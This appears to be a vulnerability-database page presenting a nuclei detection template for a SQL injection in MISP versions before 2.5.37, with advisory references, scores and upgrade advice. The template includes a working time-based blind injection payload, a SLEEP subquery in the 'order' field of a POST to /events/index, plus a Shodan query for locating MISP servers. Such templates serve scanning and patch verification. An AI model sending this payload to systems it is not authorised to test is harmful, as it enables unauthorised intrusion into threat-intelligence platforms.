Lucene search
K

MISP < 2.5.37 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

MISP before 2.5.37 is vulnerable to SQL injection via the order parameter in EventsController; upgrade to 2.5.37.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-44381
13 May 202620:50
attackerkb
Circl
CVE-2026-44381
14 May 202600:33
circl
CNNVD
MISP SQL注入漏洞
13 May 202600:00
cnnvd
CVE
CVE-2026-44381
13 May 202620:50
cve
Cvelist
CVE-2026-44381 MISP: SQL injection via unvalidated ordering parameters in event and shadow attribute listings
13 May 202620:50
cvelist
EUVD
EUVD-2026-30168
13 May 202620:50
euvd
NVD
CVE-2026-44381
13 May 202621:16
nvd
Positive Technologies
PT-2026-40809
13 May 202600:00
ptsecurity
RedhatCVE
CVE-2026-44381
5 Jun 202619:11
redhatcve
Vulnrichment
CVE-2026-44381 MISP: SQL injection via unvalidated ordering parameters in event and shadow attribute listings
13 May 202620:50
vulnrichment
Rows per page
id: CVE-2026-44381

info:
  name: MISP < 2.5.37 - SQL Injection
  author: malcha
  severity: medium
  description: |
    MISP before 2.5.37 is vulnerable to SQL injection via the order parameter in EventsController. The POST body order value is passed directly into ORDER BY clauses without validation.
  remediation: |
    Upgrade MISP to version 2.5.37 or later.
  reference:
    - https://github.com/MISP/MISP/security/advisories/GHSA-4cxp-22wm-j6jr
    - https://github.com/MISP/MISP/commit/53fc6be7da1c010ca4696a37c6e27bb699377efa
    - https://nvd.nist.gov/vuln/detail/CVE-2026-44381
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-44381
    epss-score: 0.0054
    epss-percentile: 0.41454
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"MISP"
  tags: cve,cve2026,misp,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/login HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "MISP"
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /events/index HTTP/1.1
        Host: {{Hostname}}
        Authorization: {{auth_key}}
        Content-Type: application/json

        {"order":"(SELECT 1 FROM (SELECT(SLEEP(8)))A)"}

    matchers:
      - type: dsl
        dsl:
          - "duration >= 8"
          - "status_code == 200 || status_code == 500"
        condition: and
# digest: 4a0a00473045022052671f916838b3ab1e9b44721eb17cd7de61d194333a94b95b49092aa4ad92ef0221009a7ed2e93c58233b4ecbcef39d46ae433cd74e8999441f86b31fa3c18d7feefa:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 May 2026 20:40Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3
CVSS 49.3
EPSS0.0054
SSVC
5